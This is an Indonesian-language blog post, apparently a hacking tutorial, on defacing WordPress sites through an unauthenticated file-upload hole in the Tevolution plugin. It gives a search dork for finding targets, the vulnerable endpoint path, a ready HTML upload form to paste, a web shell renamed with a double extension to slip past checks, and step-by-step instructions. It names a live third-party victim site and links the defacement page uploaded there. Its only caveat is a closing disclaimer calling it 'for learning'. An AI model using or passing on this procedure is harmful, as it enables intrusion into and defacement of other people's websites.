Deface Metode Tevolution Plugin Vulnerability - Ryangueltoem

Ryangueltoem

Kumpulan Berbagai TUTORIAL yang ada di Internet.

Breaking

Post Top Ad

All Tutor Cyber

Sunday, March 12, 2017

Home Deface Tutorial Deface Metode Tevolution Plugin Vulnerability

Deface Metode Tevolution Plugin Vulnerability


Deface Metode Tevolution Plugin Vulnerability

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Metode Tevolution Plugin Vulnerability

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini
Disini saya akan menulis artikel yang berjudul "Deface Metode Tevolution Plugin Vulnerability" Langsung saja ke tutorialnya..

Bahan Bahan :

1. Dork: inurl:"/plugins/Tevolution/" (kembangi lagii)

2. Exploit: /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. CSRF (save dengan format .html ):
<form action = "http://site.target/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method = "post" enctype = "multipart / form-data"> <label for = "file"> Filename: </ label> <input type = "file" name = "Filedata"> reviews <input type = "submit" name = "submit" value = "3xploi7ed!"> </ form >

4. Shell: format .php.xxxjpg => Download (Punya IndoXploit)
    contoh: Shell.php.xxxjpg 

5. Script deface : Download

Step by Step :

1. Dorking Dulu

2. Pilih salah satu Web
    Live Target: http://www.hebergement.rayssaguel.com/

3. Masukkan Exploitnya 
    contoh : http://www.hebergement.rayssaguel.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

Vuln ?! "Blank" (Putih semua)

4. Buat CSRF nya tadi => Masukkan Target => Save dengan format .html

5. Buka CSRF => Upload Shell / Script deface

Kalau Gagal ada Tulisan [Error]

Akses Shell?!
www.site.com/wp-content/uploads/[tahun]/[bulan]/nameshell

Akses Script Deface?!

www.site.com/wp-content/uploads/[tahun]/[bulan]/namascript.html

Live Target Tadii http://www.hebergement.rayssaguel.com/wp-content/uploads/2017/03/index.html

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Metode Tevolution Plugin Vulnerability" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Deface Metode Tevolution Plugin Vulnerability" Dengan URL https://ryangueltoem.blogspot.co.id/2017/03/deface-metode-tevolution-plugin.html
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber
Tags
Author Image

About Informasi Cyber

By -
Label: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Author Details

Kami selaku admin All Tutor Cyber mengucapkan terimakasih atas Kunjungan anda. Tutorial yang kami buat 100% murni tanpa copy paste. Jika ada yang ingin menyalin postingan dari All Tutor Cyber kami harap memberi link sumber website kami, Terimakasih.